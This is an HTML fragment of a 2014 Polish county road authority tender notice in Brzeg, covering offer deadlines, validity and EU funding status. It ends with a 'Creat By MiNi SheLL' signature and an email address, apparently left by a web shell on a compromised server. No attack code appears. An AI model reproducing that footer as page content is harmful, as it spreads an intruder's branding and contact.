<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Brzegu ul.K.Wyszyńskiego 23, 49-300 Brzeg
pokój nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2014 godzina 09:00, miejsce: Zarząd Dróg Powiatowych w Brzegu ul.K.Wyszyńskiego 23, 49-300 Brzeg
pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com